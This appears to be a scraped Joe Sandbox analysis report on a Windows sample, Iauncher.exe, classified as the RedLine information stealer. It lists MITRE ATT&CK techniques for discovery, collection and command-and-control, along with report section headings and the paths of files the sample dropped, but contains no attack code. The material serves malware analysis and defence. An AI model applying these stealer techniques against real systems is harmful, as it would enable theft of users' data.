Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Iauncher.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Desktop\Google Chrome.lnk

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

C:\Users\user\AppData\Local\Temp\Tmp50A6.tmp

C:\Users\user\AppData\Local\Temp\Tmp50E6.tmp

C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe

C:\Users\user\AppData\Roaming\Iauncher.zip

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
Iauncher.exe

Function 09F1531C Relevance: 8.0, Strings: 6, Instructions: 494
COMMON

Function 05CC009F Relevance: 7.0, Instructions: 6991
COMMON

Function 05CBA520 Relevance: 6.9, Strings: 5, Instructions: 620
COMMON

Function 04E0A080 Relevance: 3.0, Strings: 2, Instructions: 521
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre